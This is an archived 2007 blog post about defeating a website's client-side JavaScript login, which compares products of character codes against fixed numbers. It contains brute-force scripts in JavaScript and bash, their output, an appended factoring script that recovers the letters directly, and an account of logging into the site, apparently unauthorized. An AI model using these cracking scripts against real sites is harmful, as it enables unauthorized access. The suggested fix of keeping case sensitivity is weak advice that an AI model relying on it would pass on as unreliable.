Archive for July, 2007

Hacking Javascript

Monday, July 30th, 2007

I came across a website recently with the following JavaScript code to password-protect the site:

function submitentry(){
  password = document.password1.password2.value.toLowerCase()
  username = document.password1.username2.value.toLowerCase()
  passcode = 1
  usercode = 1
  for(i = 0; i < password.length; i++) {
    passcode *= password.charCodeAt(i);
  }
  for(x = 0; x < username.length; x++) {
    usercode *= username.charCodeAt(x);
  }

  if(usercode==160891453245600&&passcode==120622737064212)
  {
    window.location=password+".htm"
  }
  else{
    alert(passcode)
  }
}

I thought it might be possible to find the username and password, so I put together the following JavaScript:

// Pick seven random lower-case character codes (97-122) until their product matches.
do{
  passcode = 0
  var j = Math.ceil((Math.random()*26) + 96);
  var k = Math.ceil((Math.random()*26) + 96);
  var l = Math.ceil((Math.random()*26) + 96);
  var m = Math.ceil((Math.random()*26) + 96);
  var o = Math.ceil((Math.random()*26) + 96);
  var p = Math.ceil((Math.random()*26) + 96);
  var q = Math.ceil((Math.random()*26) + 96);
  passcode = (j*k*l*m*o*p*q);
}while (passcode!=120622737064212);
alert (j + " " + k + " " + l + " " + m + " " + o + " " + p + " " + q);

Unfortunately, the JavaScript interpreter of my browser couldn't cope with this, but the principle of the script was basically OK. You can see this by running the following script:

// Same search, reduced to four characters so that it finishes quickly.
do{
  passcode = 0
  var j = Math.ceil((Math.random()*26) + 96);
  var k = Math.ceil((Math.random()*26) + 96);
  var l = Math.ceil((Math.random()*26) + 96);
  var m = Math.ceil((Math.random()*26) + 96);
  //var o = Math.ceil((Math.random()*26) + 96);
  //var p = Math.ceil((Math.random()*26) + 96);
  //var q = Math.ceil((Math.random()*26) + 96);
  passcode = (j*k*l*m);
}while (passcode!=132825000);
alert (j + " " + k + " " + l + " " + m );

This should give you an alert message with 110 105 115 and 100 when you set up a web page with this script.

From the length of the numbers 160891453245600 and 120622737064212 I guessed there were 2 seven-letter sequences to be found. To break the original problem I had to resort to a bash script:

#!/bin/bash
RANDOM=$$

PIPS=26
MAXTHROWS=1
throw=0
passcode=0

zeroes=0
ones=0
twos=0
threes=0
fours=0
fives=0
sixes=0
sevens=0
eights=0
nines=0
tens=0
elevens=0
twelves=0
thirteens=0
fourteens=0
fifteens=0
sixteens=0
seventeens=0
eighteens=0
nineteens=0
twenties=0
twentyones=0
twentytwos=0
twentythrees=0
twentyfours=0
twentyfives=0
twentysixes=0

print_result ()
{
  echo
  echo "as = $ones"
  echo "bs = $twos"
  echo "cs = $threes"
  echo "ds = $fours"
  echo "es = $fives"
  echo "fs = $sixes"
  echo "gs = $sevens"
  echo "hs = $eights"
  echo "is = $nines"
  echo "js = $tens"
  echo "ks = $elevens"
  echo "ls = $twelves"
  echo "ms = $thirteens"
  echo "ns = $fourteens"
  echo "os = $fifteens"
  echo "ps = $sixteens"
  echo "qs = $seventeens"
  echo "rs = $eighteens"
  echo "ss = $nineteens"
  echo "ts = $twenties"
  echo "us = $twentyones"
  echo "vs = $twentytwos"
  echo "ws = $twentythrees"
  echo "xs = $twentyfours"
  echo "ys = $twentyfives"
  echo "zs = $twentysixes"
  echo "Passcode = $passcode"
  echo
}

update_count()
{
  case "$1" in
    0) let "ones += 1";; # Since a is not "zero", this corresponds to 1.
    1) let "twos += 1";; # And b to 2, etc.
    2) let "threes += 1";;
    3) let "fours += 1";;
    4) let "fives += 1";;
    5) let "sixes += 1";;
    6) let "sevens += 1";;
    7) let "eights += 1";;
    8) let "nines += 1";;
    9) let "tens += 1";;
    10) let "elevens += 1";;
    11) let "twelves += 1";;
    12) let "thirteens += 1";;
    13) let "fourteens += 1";;
    14) let "fifteens += 1";;
    15) let "sixteens += 1";;
    16) let "seventeens += 1";;
    17) let "eighteens += 1";;
    18) let "nineteens += 1";;
    19) let "twenties += 1";;
    20) let "twentyones += 1";;
    21) let "twentytwos += 1";;
    22) let "twentythrees += 1";;
    23) let "twentyfours += 1";;
    24) let "twentyfives += 1";;
    25) let "twentysixes += 1";;
  esac
}

while [ "$throw" -lt "$MAXTHROWS" ]
do
  let "die1 = RANDOM % $PIPS"
  let "die2 = RANDOM % $PIPS"
  let "die3 = RANDOM % $PIPS"
  let "die4 = RANDOM % $PIPS"
  let "die5 = RANDOM % $PIPS"
  let "die6 = RANDOM % $PIPS"
  let "die7 = RANDOM % $PIPS"
  let "passcode = (die1+97)*(die2+97)*(die3+97)*(die4+97)*(die5+97)*(die6+97)*(die7+97)"
  if test $passcode = 120622737064212 ; then
    let "throw += 1"
    update_count $die1
    update_count $die2
    update_count $die3
    update_count $die4
    update_count $die5
    update_count $die6
    update_count $die7
    print_result
  fi

done

exit 0

This was a modification of a lottery script I got off the internet. Unlike the JavaScript interpreter, the bash script just keeps running until it produces a result.

Eventually, after a day or so I returned to my computer to find the following output:

as = 3
bs = 0
cs = 0
ds = 0
es = 0
fs = 0
gs = 1
hs = 0
is = 0
js = 0
ks = 0
ls = 1
ms = 2
ns = 0
os = 0
ps = 0
qs = 0
rs = 0
ss = 0
ts = 0
us = 0
vs = 0
ws = 0
xs = 0
ys = 0
zs = 0
Passcode = 120622737064212

This revealed the passcode to be a commonly used word in dentistry. I ran through the same code again to get the username and was able to log in.

To improve the security of the website I would leave out the ".toLowerCase()" bits in the JavaScript below.

function submitentry(){
  password = document.password1.password2.value.toLowerCase()
  username = document.password1.username2.value.toLowerCase()
  passcode = 1
  usercode = 1
  for(i = 0; i < password.length; i++) {
    passcode *= password.charCodeAt(i);
  }
  for(x = 0; x < username.length; x++) {
    usercode *= username.charCodeAt(x);
  }

  if(usercode==160891453245600&&passcode==120622737064212)
  {
    window.location=password+".htm"
  }
  else{
    alert("password/username combination wrong")
  }
}

This would mean the potential cracker would have to work their computer
much harder to break the passcodes. If you introduced other characters
or numbers it would become very difficult or nearly impossible to break
down.
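
Why the check gives so little protection, as an added example (not code from the original post or from the site): the number it compares against is a plain product of character codes, so trial division factors it back into its letters without any random guessing, and every reordering of those letters produces the same number. The function names are made up for this example; the two targets and the lengths (4 and 7) are the ones used in the post.

```javascript
// Same arithmetic as the page's submitentry(): multiply the character codes.
function productCode(text) {
  let code = 1;
  for (const ch of text) code *= ch.charCodeAt(0);
  return code;
}

// Depth-first trial division: find every non-decreasing sequence of `length`
// codes in [lo, hi] whose product is `target`. Each result is the sorted
// letter multiset, not the word itself. Targets must stay below 2^53 so the
// arithmetic is exact; both numbers from the post do.
function letterMultisets(target, length, lo = 97, hi = 122) {
  const found = [];
  (function search(rest, left, min, picked) {
    if (left === 0) {
      if (rest === 1) found.push(String.fromCharCode(...picked));
      return;
    }
    for (let c = min; c <= hi; c++) {
      if (rest % c === 0) search(rest / c, left - 1, c, [...picked, c]);
    }
  })(target, length, lo, []);
  return found;
}

// Number of distinct strings that share one letter multiset (multinomial
// coefficient). All of them give the same product, so all pass the numeric test.
function orderings(letters) {
  const counts = {};
  let total = 1, n = 0;
  for (const ch of letters) {
    counts[ch] = (counts[ch] || 0) + 1;
    n += 1;
    total = (total * n) / counts[ch]; // running multinomial, always an integer
  }
  return total;
}

// The four-letter demo target and the seven-letter passcode from the post.
for (const [target, length] of [[132825000, 4], [120622737064212, 7]]) {
  for (const letters of letterMultisets(target, length)) {
    console.log(target, "->", letters, "orderings:", orderings(letters));
  }
}
```

The seven-letter result has the same letter counts as the bash output above (3 a, 1 g, 1 l, 2 m).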